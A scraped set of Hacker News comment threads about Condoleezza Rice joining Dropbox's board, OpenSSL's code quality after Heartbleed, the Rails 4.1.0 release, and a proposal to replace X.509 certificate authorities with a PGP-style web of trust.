They play in the big league now, increasingly catering to the enterprise world. And those guys are not particularly worried about privacy issues. They rather cooperate, like the PRISM companies.

It's not the first nor last time a nice, user-friendly startup turned "evil" over a certain threshold of growth. If you happen to find a large influential company that stayed true to its original promise to their users - cherish it with all your heart. They are a very rare kind.

CalRobert 3 days ago 0 replies      
OwnCloud, while not perfect, is really easy to set up. I had it running on a Droplet from Digital Ocean in about 20 minutes, and a Raspberry Pi in about 40 (note - it's a bit resource heavy for a Pi)
EC1 3 days ago 0 replies      
Very sad. I just deleted everything from my Dropbox and my account, sent them an email saying "I do not do business with war criminals."

Good luck Dropbox, I hope you un-fuckup somehow.

muyuu 3 days ago 2 replies      
You guys ever heard of rsync? It's awesome.
Diederich 3 days ago 0 replies      
My family will be migrated from Dropbox by next week.
tegeek 3 days ago 0 replies      
I ve just removed Dropbox from my life. Here are two alternates.



dombili 3 days ago 0 replies      
I only had 4 small encrypted files on my Dropbox account, so the decision to close my account was a no brainer.

I'm not even angry at them for selecting a war criminal as a board member but she supports the NSA and warrantless wiretappings. This is such a stupid decision for so many reasons. But I'm not surprised, because we deserve companies like Dropbox who doesn't care about their users private data, because we've been prioritizing convenience over security for years. Well, not anymore. Good riddance.

My problem with this is that even though Condi Rice is a war criminal, no one will say so in the media (some will, those that public don't really listen/read). But it was easy to bash Eich (and rightfully so) because marriage equality sells. Don't expect Dropbox to back off from their decision because only a small group of people will boycott them.

dang 3 days ago 0 replies      
Because this article contains very little information, the Rice/Dropbox story was posted to HN yesterday, and the current thread has gone both far off topic (relitigating the Bush years) and uncivil, we're going to demote this post.

I'm going to lighten the penalty on the other major Rice/Dropbox post, though, because although political causes are usually off-topic for HN, that story is at least new and the thread hasn't degenerated as badly.

Please note that when we say something is off topic for Hacker News, we do not mean that the topic is unimportant.

higherpurpose 3 days ago 0 replies      
Now I have no doubts anymore about Dropbox "coming soon" to PRISM, if it's not already in it.
bovermyer 3 days ago 0 replies      
Well goddammit. And here I was, about to completely switch from OneDrive+Google Drive to Dropbox.

Now I have to pull everything out of Dropbox and put it... somewhere. Google Drive, maybe. Sigh.

I hate leaving negative comments like this, but I really can see no positive light to this development.

apenney 3 days ago 0 replies      
I cancelled both my accounts over this. It'll be a personal pain, as everything on my ipad hooks in nicely to dropbox, but it's worth it in order to not support one of the Bush era war criminals.
donatj 3 days ago 2 replies      
Do any Dropbox alternatives support Mac resource forks? That's the biggest reason I stick with them, as even Google Drive doesn't.
myth_drannon 3 days ago 0 replies      
It's time for Ubuntu to re-evaluate its decision to shut down Ubuntu One
rglover 3 days ago 0 replies      
What in the hell is going on?
macinjosh 3 days ago 1 reply      
Shout out to BitTorrent Sync as a great alternative to Dropbox for some. Open and distributed so its already 2x better than dropbox.


not_paul_graham 3 days ago 2 replies      
Reasons this might be a great move for Dropbox:

1. It will help them secure major enterprise clients, probably the govt. or with ties to the govt.

2. Great selling point to institutional investors come IPO time.

3. Navigating foreign business opportunities.

Although I'm not a fan of this move by Dropbox, it is important to note that Stanford has hired Rice as a professor as well. No one is abandoning Stanford, and the hits that Dropbox is going to take are going to be minuscule in comparison to the upside. This is just the hard reality.

Rice does have a lot of experience that is relevant to Dropbox and students at Stanford and I'd just like to leave it at that because at the end of the day, connections + experiences that come from being Secretary of State trump pure meritocracy or idealism.

rdtsc 3 days ago 1 reply      
Why? What does she bring to the table?
27182818284 3 days ago 0 replies      
Partisanship aside,

I am super bullish about Dropbox, and have been since they were getdropbox.com. I think they have wonderful leadership and I've never had a single problem with their service. I've used both the paid version and the free model. I think they have amazing secret stuff planned for the next couple of years.

Even with all that said, I'm very confused. Does she have a personal connection with some of the founding team or something? I can't remember Rice ever expressing much care for tech while in the White House (unlike Al Gore's http://en.wikipedia.org/wiki/Information_superhighway) and even then Al Gore joined Apple, not Box.com or Google Drive. Even if she had gone with Google, Microsoft, Oracle, or IBM, it would have made more sense to me.

Nemant 3 days ago 0 replies      
Guys you don't get it.

Dropbox is going to improve the internet by finding all of the Documents of Mass Destruction.

Shutting down dropbox

ekianjo 3 days ago 1 reply      
> Rice is a famous figure, known in almost equal parts for her ferocious intelligence, and controversial role in the Bush administration, which included comments on alleged weapons of mass destruction that Saddam Hussein was thought at the time to possess.

TC needs to correct that last sentence: "weapons of mass destruction that Saddam Hussein was KNOWN NOT TO possess" would be more correct in light of what actually occurred behind the scenes.

embro 3 days ago 0 replies      
I signed up for Wuala about a month ago.Wasn't ready to make the switch but... It's time to make it happen.
rainmaking 3 days ago 0 replies      
Well, this certainly puts all the hysteria about Brendan Eich in perspective.
lexcorvus 3 days ago 0 replies      
"Tech-company boards should have more women and [underrepresented] people of color!" The Mob, yesterday

"But not someone whose politics we don't like!" The Mob, today

nsxwolf 3 days ago 0 replies      
Rice's views on internet privacy, in light of her support of bulk data collection, are legitimate concerns for her appointment to the board of a company like DropBox.

The war criminal stuff, though, is just pointless. We're all war criminals for supporting this or that candidate. It's just more shades of Eich, grist for purists, but irrelevant to a decision to continue using or boycotting DropBox.

arbuge 3 days ago 0 replies      
There is also the argument to be made that Condi is unlikely to add much value to a tech company like Dropbox in reality, which means Dropbox is autopunishing itself here.

And if the opposite is true, and she will add alot of value, then who can blame Dropbox for making this call?

duncan_bayne 3 days ago 0 replies      
People still use Dropbox, after they pre-emptively screwed Boxopus?


wellboy 3 days ago 0 replies      
Finally, Dropbox is also an NSA company. Took them quite a while...
Cbasedlifeform 3 days ago 0 replies      
As it happens I was just looking at DB alternatives that would be more secure. The news that they have hired Condi the war criminal Rice to join their board is the clincher. Bye bye DB.
gboone42 3 days ago 0 replies      
I hear Box has weapons of mass destruction.
pointernil 3 days ago 0 replies      
"On a similar Note: Rumsfeld joined the Board of Twitter" -- NO he did not. And I really hope he does not.Onion-News-Network please take over ;)
marshray 3 days ago 1 reply      
Say what you want about politics, that lady is sharp as a tack (and a concert pianist too).
javindo 3 days ago 0 replies      
It's a shame to see such a thing happening to a YC project, but I suppose they're all grown up now and responsible for their own decisions.
izzydata 3 days ago 0 replies      
Why is dropbox doing this exactly? What can she possibly do to help them?
rootuid 3 days ago 1 reply      
I'm more outraged by Condi's appointment than Brendan Eich's appointment to Mozilla.

Condi preached death and torture, Eich supported bigotry.

I'm sure however that nobody really give a f and the status quo will be maintained.

cheshire137 3 days ago 0 replies      
Dammit, I just got excited yesterday about Mailbox coming to Android.
TheMagicHorsey 3 days ago 0 replies      
What the fuck is this left-wing McCarthyism!

Fuck this shit. I hope Hacker News doesn't fall for this garbage ass new trend. The Mozilla affair was bad enough. This bullshit is going too far.

I'm a libertarian leaning Democrat BTW, if you need to peg me in a hole.

general_failure 3 days ago 0 replies      
I am a bit ignorant here. What makes Rice a good candidate for the board? Because she has good tie ups with political big wigs of other countries?
Ryel 3 days ago 0 replies      
Can someone post up Dropbox alternatives? Particularly any service that is blessed by, or maybe created by a HN user?
canistr 3 days ago 0 replies      
What's fascinating about the comments is that, had Condoleezza Rice been appointed Commissioner of the NFL, would people have said "I'm giving up the NFL forever"?

Obviously this question should only apply to NFL fans who also make this claim about dropping DropBox as a service.

dllthomas 3 days ago 0 replies      
This seems like a thread that would benefit from that "pending" feature...
donatj 3 days ago 0 replies      
The overreaction and moral indignation of HN of late is irritating to say the least.
Zenst 3 days ago 1 reply      
She is an intellegent person, so could somebody explain too me why so many deem this a bad move without mentioning the War,WMDs,NSA or some political bias?

I'm all ears.

boston1999 3 days ago 1 reply      
Why would they choose her while there are so many other more qualified people for the board of a technology company!
Eric_WVGG 3 days ago 0 replies      
1 year of Dropbox == 1 "Transporter Sync personal cloud"

I guess this is the push I needed.

thrillgore 3 days ago 0 replies      
I'm with the peanut gallery on this one. Fuck Dropbox.
med_abidi 3 days ago 0 replies      
I'm dropping Dropbox forever.
boondox 3 days ago 0 replies      
Was thinking of running my own server/Dropbox replacement for awhile now. This news is just the kick my rear needed to put my plans in gear.
eneifert 3 days ago 0 replies      
If I wanted political rants I would go back to reddit. Come on Hacker News, you're better than this.
zos 3 days ago 0 replies      
camus2 3 days ago 7 replies      
and Al Gore is on the board of many businesses... what's the big deal with it? because she's republican?

EDIT: why am i downvoted? because i'm pointing out ex politics on both sides seat on boards or because i talked about being republican,which is not popular here?

charismaticfoo 3 days ago 0 replies      
How is Condoleeza Rice joining Dropbox, make Dropbox vulnerable in the hands of big brother than it already is? I do think it is a bit of an over reaction to move out of Dropbox solely because of this reason. In these days of Prism, we should assume that most of our private stuff is available for surveillance, unless we are ready to pay for a trusted fully encrypted (without de-deplication) sharing service.
veidr 3 days ago 0 replies      
Brandon Eich isn't cool. You know what's cool?


"OpenSSL has exploit mitigation countermeasures to make sure it's exploitable" gmane.org
463 points by anon1385  4 days ago   236 comments top 16
stiff 4 days ago 9 replies      
It is surprising that a project that is quite mission critical is completely at the bottom of the scale when it comes to how much the development process is oriented toward reliability. There are no systematic unit tests, no systematic documentation, the best you get is a bunch of disorganized integration tests, so it is not even at the level you would expect for a decently maintained business project: https://github.com/openssl/openssl

Perhaps the open source model of development is just not very good for software of this kind. Of course it's good that the source is open for everyone to look and potentially contribute, but without funding and without having a real process and a full time team it seems to me it is hard to get the level of quality required.

I also wonder how much in the end the big institutions care about this stuff. Intel hires a bunch of guys to do formal models of their processors to ensure bugs aren't shipped to millions of customers, why is nobody funding a formally specified version of SSL? For other mission critical systems, like what goes into spacecrafts, or hospitals, or gets developed in the military there are rigorous processes in use to prevent stupid mistakes, so it's somewhat disappointing that the major infrastructure pieces don't receive this kind of treatment.

bhouston 4 days ago 7 replies      
Has anyone started a rumor yet that the NSA infiltrated the OpenSSL development team to make OpenSSL ineffective and full of holes?

The convoluted code of OpenSSL alone (from yesterday's Hackernews post) seems like a great way to add all sorts of "bugs" inadvertent or not.

Unfortunately with the Snowden disclosures, there isn't much that I rule out of bounds for the NSA when it comes to things critical to internet security. OpenSSL is so widely used and critical, it would be silly to think that it would escape scrutiny by the NSA.

Remember that the Snowden docs says that the NSA can break SSL/TLS/https/VPN, etc., but we do not know the full details: http://blog.cryptographyengineering.com/2013/12/how-does-nsa... But the one thing all of these technologies (SSL,TLS,https,VPNs) have in common is usually OpenSSL.

josteink 4 days ago 0 replies      
I may be biased in that I have not written much C-code in years (decades?), but whenever I find a codebase covered in IFDEFs, I start assuming that every single new IFDEF introduces a new condition into the system which has not been properly nor recently tested, and that the software is horribly broken.

For me, fixing software, is just as often removing IFDEFs together with unmaintained and broken code. It's IMO much better to be honest about "this isn't supported", than pretend you support something you don't.

And this seems to be another one of those stories, coupled with a (bad?) case of NIH.

jimrandomh 4 days ago 0 replies      
btown 4 days ago 3 replies      
This should be a case study about why people developing system-critical software shouldn't write their own memory allocators.
robin_reala 4 days ago 6 replies      
So what are the options then if OpenSSL isnt fit for purpose? Is it possible to move wholesale to a different project? Are any of them trying to ease migration over from OpenSSL to themselves?
ScottBurson 4 days ago 0 replies      
So what if someone tried to crowdfund a new implementation (or a thorough rewrite of OpenSSL, if that makes more sense). Could they raise something on the order of $1M? It seems like it would cost that much for, I'm guessing, three absolutely top developers for two years. Unlike a lot of crowdfunded projects, this one would not launch a business -- there's no additional revenue opportunity for the developers once it's completed -- so the amount would have to compensate them not just for their time but also for their opportunity cost.

On the other hand, given the importance of TLS to the Internet, $1M seems less than trivial -- literally pocket change, if the cost were well distributed among the millions of websites using SSL.

What do you think? Could it be done?

mannykannot 4 days ago 3 replies      
The 'many eyes' hypothesis has now been empirically tested.
Orangeair 4 days ago 0 replies      
I echo what someone said earlier on another OpenSSL thread: security applications should not be handling their own memory at a low level like this. It's just too easy to mess up, and it often leads to the worst vulnerabilities.
bananas 4 days ago 2 replies      
Great analysis. Theo is always up front on this sort of stuff which is commendable.
gpvos 4 days ago 1 reply      
OpenSSL was derived from SSLeay. Was SSLeay already that bad?
maxbucknell 4 days ago 1 reply      
If there are so many problems with OpenSSL, why are there no alternatives that are readily available and anywhere near as functional?

The whole internet runs OpenSSL, but why hasn't anyone tried to do something different? I know it's complicated, but if a few big companies really chose to put some muscle behind it, it could happen, right?

keithgabryelski 4 days ago 0 replies      
the lesson: general and up-to-date understanding of larger systems is sometimes required to make the most innocuous changes.

be a generalistkeep up on current technologies

jokoon 4 days ago 0 replies      
yeah, why not rename this to NSASSL
renox 4 days ago 1 reply      
I find this remark quite funny from someone who is using C to write a "secure" OS..
supersnap 4 days ago 3 replies      
This is pretty much proof that open source fails to maintain security software in a responsible way.

Look kids ssl is not that hard to implement.

Time to let the cargo cult go have a campfire and sing songs.

This is too important to leave to lazy paid for nothing programmers who want to write lazy ass c code after too many beers.

Grow up

Rails 4.1.0 released rubyonrails.org
384 points by chancancode  5 days ago   95 comments top 15
eggbrain 5 days ago 7 replies      
For those curious as to how things go from Rails 3 to Rails 4.1, I've now built a few Rails 4 and 4.1 apps for clients and here's been my thoughts:

1) Turbolinks comes standard with Rails 4, and you will either love it or hate it. If you do use it, expect your javascript to break at one point or another. The jquery.turbolinks gem helps, but I've still had to debug a bunch of funky behavior with it.

2) Strong parameters takes a while to get used to from the old attr_accessesible way of doing things. That being said, I think it's worth it to learn it. It prevents a lot of conditional attr_accessible :blah, :as => :admin that goes on. The one thing I'd say is if you are going to use strong parameters, you might want to install a gem like Annotate so you can keep track of your attributes in the models. Sure you can just look in Schema.rb, but tabbing back and forth gets to be kind of a pain.

3) Secrets.yml is great, no more worrying about adding your config.secret_token to the .env file when generating every single project.

4) Mail Preview is nice, but for some reason I still seem to use Mailcatcher mostly to view / see how emails render out. Think this is mostly me sticking to my own ways.

5) ActionController::Live still feels pretty half baked. The fact that most examples / tutorials on the web still use the default example of:

    100.times {      response.stream.write "hello world\n"      sleep 1    }
Seems quite telling. It feels like they've given some of the pieces to get live streaming working flawlessly, but we are still missing a few tools here.


The biggest problem I've had is that some gems that we used frequently would break because they weren't Rails 4 ready. We use ActiveAdmin pretty frequently in our client apps, and it's worked for a while, but it's always been on a custom branch and still had some issues that were just recently fixed. YMMV for gems that your app relies on in terms of what will break and what will work.

quaunaut 5 days ago 1 reply      
The Enum implementation seems full of caveats.

1. It saves values as integers in the database, meaning that removing properties involves explicit setting, and reordering them requires custom migration code.

2. "Avoid using the same names inside different enums in the same class! Doing so will leave Active Record very confused!"[1]

That's right, we can't use the same enum name to two different fields because ActiveRecord might get confused. That's kind of poor, isn't it?

3. Having to pass a macro that'll return the right integer instead of the symbol itself? Really?

This all seems really unwieldy, especially in the face of Enumerize(https://github.com/brainspec/enumerize). It's got none of these caveats. Is there some strength to the Rails enums that Enumerize doesn't capitalize on, other than size constraints by using Int instead of String?

[1] http://brewhouse.io/blog/2013/12/17/whats-new-in-rails-4-1.h...

losvedir 5 days ago 11 replies      
My company is still on Rails 3.2. We had been waiting for the first minor release of Rails 4 to give folks a chance to work out issues, so maybe now it's time to look at upgrading.

Anyone have major issues going from 3.2 -> 4? I've heard horror stories about 2 -> 3, but I didn't pick up Rails myself until 3.x so I don't have firsthand experience.

The biggest change I see is attr_accessible to strong_parameters. Does that mean I need to go through and rewrite all our models and controllers before we can update?

recursive 5 days ago 3 replies      
I don't have much to say about any of the new functionality, but Spring seems like a very poor name for anything new related to programming.
callmeed 5 days ago 1 reply      
Having mailer previews built in is pretty awesome. I pretty much use a gem for that on every project nowadays.

The variants thing is interesting ... I'm assuming its an alternative to rendering a responsive/mobile-first view (on a view-by-view basis). I'm sure there are plenty of use-cases but I don't like the prospect of having to update yet-another-set-of-layouts-and-views.

matthewmacleod 5 days ago 2 replies      
Upgrading from 4.0 to 4.1

  1013 runs, 351 assertions, 6 failures, 832 errors, 0 skips
Ouch. Still, it's great to see development on Rails continue. It really hits a great sweet spot for small to mid-sized apps.

Edit: Actually easier than I thought; about 10 minutes to figure out the cause and remove a surplus gem, and we're all green. Cool.

DanielKehoe 4 days ago 0 replies      
I've updated the Learn Ruby on Rails book for Rails 4.1:


Also, there are 5 starter apps for Rails 4.1 from Rails Composer:


simple10 5 days ago 1 reply      
We've been using Rails 4.1 release candidates for a couple of projects. It's worth the upgrade from 3.2.

Here's a Rails 4.1.0 starter kit that's production ready and full featured: https://github.com/starterkits/rails4-starterkit

joevandyk 5 days ago 1 reply      
You'd think the new enum support could use.. you know.. ENUMS. http://www.postgresql.org/docs/9.3/static/datatype-enum.html
karmajunkie 4 days ago 0 replies      
Am I the only one who thinks the `Module.concerning` thing is silly?

Concerns never did anything for reducing real complexity in the first place, except improve code geography, and now we don't even have to bother with that. Yay.

sergiotapia 5 days ago 0 replies      
I am _stupidly_ excited for Variants. No more .hidden-xs, visible-xs markup for me. I can taste the savings! :D

A massive thank you to the Rails team for their time and commitment towards making the best web framework on the web even better!

desireco42 4 days ago 0 replies      
The only thing I noticed, aside from secrets file and cookies etc that is outline in the notes, is that SimpleForm stopped working. Since project I was upgrading was small, I just removed it, but that is not option for bigger projects.
abvdasker 5 days ago 4 replies      
Mailer previews will literally shave hours of time off of my email testing workflow no more mail-to-a-test-account-and-wait garbage. And that's one of the minor features.
NicoJuicy 4 days ago 0 replies      
Is SQLLite fixed for Windows 7 or Windows 8 x64? This was the reason why i uninstalled Rails 4...
Podeau 5 days ago 0 replies      
Heartbleed should bleed X.509 to death svbtle.com
381 points by lorddoig  4 days ago   147 comments top 31
tptacek 4 days ago 10 replies      
What you want is Moxie Marlinspike and Trevor Perrin's TACK.

It is already the case today that for Chrome and Firefox users, a compromised CA can't easily hijack connections to Google Mail. Not only that, but any attempt to hijack Google Mail connections in the large will run aground on Chrome and Firefox users, who will not only not accept the rogue certificates, but will also alert Google, which will put a gun to the head of the CA.

The feature that enables this is called certificate pinning. It works well for small numbers of high-profile sites, but requires manual intervention on the part of browser vendors.

TACK pushes certificate pinning out to site operators. It works like HSTS: the first connection to a website is trusted, and that connection loads up state that the browser holds. Subsequent connections check for consistency with the first connection. Dynamic pins, or "tacks", make dragnet surveillance of all sites asymptotically as risky as spoofing Google Mail. The attacker is nearly certain to accidentally catch someone with a tack loaded, and at that point the game is up: the attempt to present an otherwise-valid certificate that violates a tack is a smoking gun, to which Google and Mozilla ca respond with their own firepower.

The nice thing about TACK is that it works alongside the CA hierarchy, and even derives some value from it. A tiny fraction of the Internet could adopt TACK and still make life much harder for attackers. The effort required from site operators is small, and the whole system is invisible to end-users.

Fixing the CA hierarchy is a lot less sexy than ground-up rewrites of the whole Internet security model. But the ground-up rewrite is never going to happen, and the incremental fixes are not only doable, but doable by the kinds of generalist developers who are champing at the bit to stick it to the NSA. The biggest security problem on the Internet isn't protocols; it's browser UX.

ChuckMcM 4 days ago 3 replies      
Sigh, nice try but it doesn't work. It does remind me of the adage that goes, "For every complex problem there is an answer that is simple and wrong."

The web of trust model doesn't scale, that was made abundantly clear by PGP when it first came out. Even Phil Zimmerman, the guy that practically invented it, agreed it didn't scale and something else was needed. X.509 came about not because some person foisted it on the universe, rather a bunch of people who were writing security systems at the time (myself included) got together with other cryptographers, engineers, and administrators under a group hosted by "Public Key Partners" (the folks collecting together the Patent pool associated with public keys) and tried to come up with ways this might work.

It has had some fabulous successes, certificate authority compromised? Pull their root cert and blam none of their keys are trusted any more. It had some failures. Call the baby ugly if you must, but at least propose something that hasn't already been tried and shown not to solve the problem.

[Edit: I really need to keep peoples names in different buckets in my head]

hendzen 4 days ago 7 replies      
Not going to happen. The WoT is a usability nightmare for the 99.9% of nontechnical users that don't care about things like 'p2p' & 'decentralized'.

Do you really think Granny is going to be happy with the tablet she bought that can't connect to her online banking account out of the box? Have fun explaining to her that she needs to exchange keys with enough trusted intermediaries to have a valid trust path to her bank. I'm sure there plenty of key signing parties happening at the 'ol retirement home.

Or maybe you can explain to Granny why her money was stolen when a scammer managed to compromise one of her trusted keys and then created a compromised subgraph in the WoT leading to a fake certificate to her bank?

The WoT is a usability nightmare. Sure, the PKI isn't too great, but it's what we have, and it is currently more practical than any other solution out there. Security needs to be usable to be useful.

EDIT: for a good rebuttal to the OP, read this blog post by Mike Hearn which covers the issues I raised and more: https://medium.com/bitcoin-security-functionality/b64cf5912a...

abalone 4 days ago 1 reply      
tl;dr: Don't trust big scary corporations like Symantec to verify sites, trust your friendly local geek's network.

I think if you weren't exhausted by the sheer length of the post by the time you reach that proposal tucked at the very end, you might think to ask some critical questions. Like, what are the vulnerabilities and exploits of a peer-to-peer system? Would this not be open season on socially engineering average folks to trust the wrong peer? How vulnerable to attack are local geeks and university computer science departments? How are compromises noticed and handled by the average folks who trust a small local authority? How will the verification work be paid for, or will it be completely volunteer based, and how efficient will that be?

Moreover, what the author fundamentally misunderstands is the importance of usability in security. Web security isn't perfect but that's because more perfect security would make ecommerce annoyingly difficult. Then people start taking shortcuts or just ignore security completely, which is a worse outcome. It's not enough to point fingers at users and yell that they're doing it wrong; security architects have to take responsibility for security outcomes. A peer-to-peer system would be significantly more inconvenient for average folks to use correctly, if only because of figuring out who to trust in the first place.

valarauca1 4 days ago 3 replies      
The problem I see with PGP is you'll end up with thousands if not millions of keys you need to keep on hand to decrypting everything. Not to mention the web of trust will be massive and navigating will likely start taking very large CPU power if its strictly peer to peer.

To avoid this most people will start just trusting larger companies; Google, Facebook, Apple, Mozilla. And only checking their keys, since they will trust that company's key. And these companies will handle signing new websites. Small websites won't care if you personally trust them, they'll only care if one of the 'big companies' trust them.

In the end we wind up exactly where we started. Large companies are implicitly trusted by everyone. Sure you may sign your key off to a few dev friends so you can access their test sites, which will make self signing easier. The cost will be mitigated, but in reality nothing will change. Even likely within a 3-4 Browser Generations we'll see non-Company trusted PGP keys get scrapped in all but the more free (as in beer) browsers.

wmf 4 days ago 2 replies      
A bug in a PGP implementation could have leaked your PGP private key. A bug in an SSH implementation could have leaked your SSH private key. CAs may be a flawed concept, but I don't think they have anything to do with Heartbleed.
weavejester 4 days ago 2 replies      
The Queen/Princess/DNA analogy was more confusing than actual system of certificate signing.

The author also underestimates the consequences of performing a MitM attack with a root certificate. MitM attacks can be detected and a copy of the signed cert is proof. If the NSA were abusing a root cert, there is a chance it could be noticed.

So what if it was? Well, that certificate would be removed from browsers and operating systems. The CA would be placed under suspicion. In a worst case scenario, the CA could be completely ostracised, perhaps even to the point bankruptcy. An abuse of a root certificate could potentially do hundreds of millions of dollars worth of damage.

That's not even covering the diplomatic fallout. If the CA points the finger at the NSA, the President would have to explain why the target was so important that it merited destroying part of the root trust system of the Internet.

There are far less messy ways of dealing with a high-value target. I'd be more concerned about other zero-day vulnerabilities the NSA might have found.

kijin 4 days ago 2 replies      
I would much rather trust a handful of multinational corporations than a group of "local geeks" to tell me which keys I should trust.


1) It is probably easier for casual attackers to trick a local geek to trust a phony key. Determined attackers and state-level actors can probably compromise CAs as well, but most day-to-day threats are of the casual type.

2) When a local geek accidentally trusts a phony key, and other people realize it and point it out to them, all that happens is "Oops, I'm sorry." When Comodo is caught issuing phony certificates, there will be a Silicon Valley-wide uproar, browser vendors will very quickly invalidate the offending intermediate key, and the incident will hurt Comodo's bottom line for many years afterward. In other words, Comodo is more accountable than any private individual, not because it's any more ethical, nor because it is any more competent, but simply because it is a highly visible target of public scrutiny whose very survival depends on its public image as a trustworthy CA.

3) Most people (including but not limited to grandmas) who are just beginning to use the Internet have no way to know which keys to trust. We in the programmer community are an exception, not the rule. So what's actually going to happen is that browsers will trust, by default, a bunch of highly reputable individuals or groups (perhaps the browser vendors themselves) and advise the user to trust whomever these people trust. That's not really different from the current situation with CAs. We just replace Verisign and Comodo with @cperciva and @tptacek.

notdonspaulding 4 days ago 2 replies      
> And fundamentally you have to trust that they who hold the Queens arent dishing out copies of your certificates.

In general, I'm a fan of analogy, but I'm having trouble following this whole queen/princess/baby thing. Putting that aside, I think you're claiming that CAs can present your certs to random clients?

This might be an indictment against the DNS system, which directs the clients to an IP address of its choosing, but if the client makes it to your server, your server chooses which cert to present to the client.

> What we have done here is fitted our doors with some mega heavy duty locks, and given the master keys to a loyal little dog.

Again with the strained analogy. Who's the dog? What does the mega lock represent?

I think this belies a fundamental misunderstanding of what the CA is doing. The client asks your service to validate itself, your service does so by saying that Verisign/Thawte/etc. has previously signed the cert that your service sent to the client. The client does not have to automatically trust Verisign or Thawte or whomever you say signed it, and furthermore, if it decides that it does trust that party, the NSA is not able to use that to its advantage in any way as a result of Heartbleed.

> As of today, that green padlock no longer means what it once did. And the reason for that is because of the business conditions of gatekeepers.

No, it doesn't mean what it did yesterday because of a bug in an implementation of OpenSSL. The protocol is still just as valid. The business conditions of the gatekeepers, while distasteful to you, doesn't invalidate the mechanisms by which that little green padlock gained its fame.

jessaustin 4 days ago 1 reply      
He who controls a Queen can make functionally equivalent copies of every Princess and Princess-baby in the Queens lineage. They have the skeleton keys to your secure kingdom and could at any time decide to become a fraud factory and dish out copies of your keys to whomever they fancy.

In a sense, it's worse than that, because a "queen" can actually sign (correctly or not) any "princess-baby" in any "lineage".

jboynyc 4 days ago 1 reply      
Previous HN discussion on Monkeysphere, a Debian project which implements something like what the author envisions: https://news.ycombinator.com/item?id=6617132

And the description from the Monkeysphere site on why they are a better alternative for HTTPS: http://web.monkeysphere.info/why/#index1h3

saintgimp 4 days ago 0 replies      
A couple of problems:

The average internet user has no idea who's trustworthy and who isn't. If they have to personally grant trust in order to get at some content they're looking for, they'll simply do it. This is the same behavior that causes people to execute boobs.exe attached to a random email that landed in their inbox.

In order for this to work, the average internet user must cede the trust decision-making process to some other entity who claims to be more qualified to do it, like say the company who makes their browser. There are four browser makers that account for probably 90+% of usage. Now you're right back to where you started with the current oligopoly system, except that with the new system there's a much larger attack surface for nefarious agents to use when trying to insert themselves into the trust chain because anyone at all could let them in.

Cynically, that's the problem with internet security protocols in general - they have to work not only for smart, self-interested people but also for stupid people who are actively self-harming. That's a really tough bar to meet.

joeblau 3 days ago 0 replies      
I used to work on PKI and this right here would have the old guard of system security architects up in arms:

  > 90% of that guff can be automated and hidden underneath a good UI, but can we  > dispense with the need for key exchange parties? Absolutely we can.
So who builds this "good UI that everyone trusts"? Without details of how this works, there is no way this system can grow. There is no way to have efficient key exchange except though an arduous process of everyone creating this mesh of trust manually. PKI creates this "good UI everyone trusts" with a bad UI that everyone trusts which has turned into these 4 companies that are mentioned in the article. It sounds good, but it's an iron triangle.

PeterWhittaker 4 days ago 0 replies      
Im not a cryptographer; nor am I a hard core C guru; nor have I invented some brilliant library that gives me street cred to talk about this stuff. Im a nobody.

But somehow I am qualified to inform the world as to why PGP is superior to X.509.

I'm not debating that point, and informed debate would be welcome. And I have to say that I find it refreshing for a blogger to so inform me in the first paragraph as to just how quickly I should skim through or close their rant.

I really did appreciate that. Though somehow I find myself investing more time in the writing of this comment than in the consumption of the article. Fortunately, like floss, 't'will soon be forgotten.

Nursie 3 days ago 0 replies      
Heartbleed and X.509 are basically unrelated aren't they?

The OpenSSL bug that allows heartbleed is nothing at all to do with the (many) flaws in the public trust system.

The fundamental problem here (as I see it) is that you're trying to set up trust between parties that have no existing relationship. This requires third parties and externalised trust whether you use a CA or a P2P net.

Either way, it's nothing much to do with heartbleed, which would have leaked the keys to the kingdom under either model.

astrodust 4 days ago 4 replies      
Can't this be solved with some kind of distributed, authenticated, pre-existing protocol? Something like...


With the DNSsec extensions it should be possible to publish enough information to authenticate a given site against a certificate. If your DNS has been compromised you've got bigger problems than your SSL cert.

mcgwiz 3 days ago 0 replies      
Rather than all the engineers and tech-minded people here naysay the idea into oblivion, I think it's worthwhile that we encourage designers to take an earnest stab at this problem.

The complaints here are basically "w.o.t. is not usable", but that's basically what the author said. He therefore also indicated this is as much a design problem as anything else. That's a useful insight we shouldn't dismiss, at least not until some thoughtful, imaginative designers have actually taken a crack at it.

jmspring 4 days ago 0 replies      
The article makes a generalization that is not correct in most cases around certificate request and issuance --

"And fundamentally you have to trust that they who hold the Queens arent dishing out copies of your certificates."

The entity holding the Queens can give out a copy of your certificate, sure, but in most cases, they do not hold the crown jewels -- your private key -- which is the part of the Heartbleed bug that is really bad.

There have been cases of CAs either issuing or being compromised and issuing new certs which duplicate a site identity, but that is different then releasing the private key of a particular certificate.

spiralpolitik 4 days ago 0 replies      
Not going to happen because the main OpenPGP implementation (gpg and gpg2) currently has a non permissive license that as such that it cannot be used "Everywhere".

Until there is a implementation of OpenPGP that uses a permissive license, getting the world plus dog to switch to PGP is a non starter.

GoodPractice 4 days ago 0 replies      
From the perspective of a layperson with limited tech knowledge I really like the way you explain things!
negamax 3 days ago 0 replies      
Next 10 years will be all about decentralization of every infrastructure and institution. Only in a trustless system we can have any chance at trust. So no CAs, no authorities.
nardi 4 days ago 0 replies      
The missing piece of this for me is: How do we fix X.509 for mobile apps, considering 80%+ of mobile usage is in apps, not browsers?
pskocik 4 days ago 0 replies      
He who controls a Queen can make functionally equivalent copies of every Princess and Princess-baby in the Queens lineage. They have the skeleton keys to your secure kingdom and could at any time decide to become a fraud factory and dish out copies of your keys to whomever they fancy.

This seems like utter nonsense to me. Certification authorities should never get to look at my private key, and I don't care about them giving out my public key (it's public, after all). The best they can do, if they're evil, is create a new pair with information that impersonates me.

exelius 4 days ago 0 replies      
The problem isn't any one cryptography scheme; the problem is trust. How do we build a trust framework that facilitates commerce on a wide scale while remaining truly secure? I don't think we can; so we give up a little bit of security for a whole lot of economic benefit.

Without centralized, trusted gateways, it's not even clear that your communications are secure. They need to be centralized to make them easy to monitor and audit. With a distributed trust model, the compromise of one node can be catastrophic; all you're really doing is handing control of the trust network over to botnets.

This is a really hard problem. I can't think of a better solution that would serve the same niche as our current one.

mrerrormessage 4 days ago 0 replies      
Surely if Zuck got half the world signed up for a network that does nothing but suck our eyeballs in return for money out of advertisers pockets, we could get a few million, even say, 10-20 million people using PGP. Remember that Tor was once considered a niche tool as well.
lorddoig 3 days ago 0 replies      
ClashTheBunny 3 days ago 0 replies      
This already exists:http://web.monkeysphere.info/
elchief 4 days ago 0 replies      
